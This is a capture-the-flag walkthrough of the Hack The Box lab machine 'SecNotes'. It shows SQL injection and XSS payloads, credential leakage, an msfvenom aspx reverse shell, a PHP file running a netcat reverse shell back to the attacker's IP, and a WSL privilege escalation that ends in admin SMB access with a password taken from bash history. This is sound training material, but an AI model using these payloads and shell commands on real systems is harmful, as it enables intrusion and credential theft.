Hackthebox - SecNotes
Windows

Nmap
┌──(root💀kali)-[~/Documents/hackthebox/secnotes]
└─# nmap -T4 -A -p- 10.10.10.97
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 10:46 EDT
Nmap scan report for 10.10.10.97
Host is up (0.025s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
| http-title: Secure Notes - Login
|_Requested resource was login.php
|_http-server-header: Microsoft-IIS/10.0
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (89%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP3 (89%), Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-04-02T14:50:46
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: SECNOTES
| NetBIOS computer name: SECNOTES\x00
| Workgroup: HTB\x00
|_ System time: 2022-04-02T07:50:47-07:00
|_clock-skew: mean: 2h22m41s, deviation: 4h02m32s, median: 2m39s
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 24.69 ms 10.10.14.1
2 24.84 ms 10.10.10.97
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.12 seconds
Port 80
There is a website in which we can register
There is also a message disclosing an email address
So we keep it aside
tyler@secnotes.htb
we can also edit our/etc/hosts
file and add10.10.10.97 secnotes.htb
in itNo sqli in the login
Let's try on the register if we register a user with username
<script>alert(1)</script>
when we login with it after we have a stored xss:So we need to investigate the username parameter and see if it might be vulnerable to sqli
Let's try with this
' or 1=1; --
we get an internal server error when trying to login with this after but if we register with'OR 1 OR'
it actually works and we get all the ticketsWe even get a user and password:
tyler / 92g!mA8BGjOirkL%OG*&
along with what looks like an smb folder so definetely worth trying to connect there\\secnotes.htb\new-site
SMB
┌──(root💀kali)-[~/Documents/hackthebox/secnotes]
└─# smbclient \\\\10.10.10.97\\new-site -U tyler
smb: \> download test.txt
download: command not found
smb: \> put test.txt
putting file test.txt as \test.txt (0.0 kb/s) (average 0.0 kb/s)
smb: \> ls
. D 0 Sat Apr 2 17:04:06 2022
.. D 0 Sat Apr 2 17:04:06 2022
iisstart.htm A 696 Thu Jun 21 11:26:03 2018
iisstart.png A 98757 Thu Jun 21 11:26:03 2018
test.txt A 0 Sat Apr 2 17:04:06 2022
7736063 blocks of size 4096. 3395585 blocks available
We get to a share that hosts the default files of the webserver on port 8808. We have write rights (you can see above that I was able to download a test file) so we could use and aspx reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=5555 -f aspx > shell.aspx
We put it on the share
put shell.aspx
We launch on listener
rlwrap nc -lvp 5555
We browse to our reverse shell from the website - does not work :$ - our file are deleted
Let's try to put
/usr/share/windows-resources/binaries/nc.exe
in itWe can then make a php file that will launch nc and connect it to our machine so that we get a reverse shell:
<?php
system('nc.exe -e cmd.exe 10.10.14.4 5555')
?>
We can then browse to the page, and we get a shell
We can then grab the user flag
Privilege Escalation
In the desktop of tyler there is a bash.lnk. We could use this from payload all the things to privesc
Let's see if we have a bash.exe file somewhere
where /R c:\windows bash.exe
c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe
Now let's find wsl.exe
where /R c:\windows wsl.exe
c:\Windows\WinSxS\amd64_microsoft-windows-lxss-wsl_31bf3856ad364e35_10.0.17134.1_none_686f10b5380a84cf\wsl.exe
Let's see if we are root with wsl:
c:\Windows\WinSxS\amd64_microsoft-windows-lxss-wsl_31bf3856ad364e35_10.0.17134.1_none_686f10b5380a84cf\wsl.exe whoami
root
We are root
Let's launch the bash to get the shell
Let's spawn a tty shell
python -c "import pty;pty.spawn('/bin/bash')"
if we type history we have an instresting output
history
1 cd /mnt/c/
2 ls
3 cd Users/
4 cd /
5 cd ~
6 ls
7 pwd
8 mkdir filesystem
9 mount //127.0.0.1/c$ filesystem/
10 sudo apt install cifs-utils
11 mount //127.0.0.1/c$ filesystem/
12 mount //127.0.0.1/c$ filesystem/ -o user=administrator
13 cat /proc/filesystems
14 sudo modprobe cifs
15 smbclient
16 apt install smbclient
17 smbclient
18 smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
19 > .bash_history
20 less .bash_history
21 uname -a
22 pwd
23 ls -al
24 history
We have the password for the admin por smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\10.10.10.97\\c$
And it works! We can actually connect as administrator to an smb share we just need to grab the flag
Last updated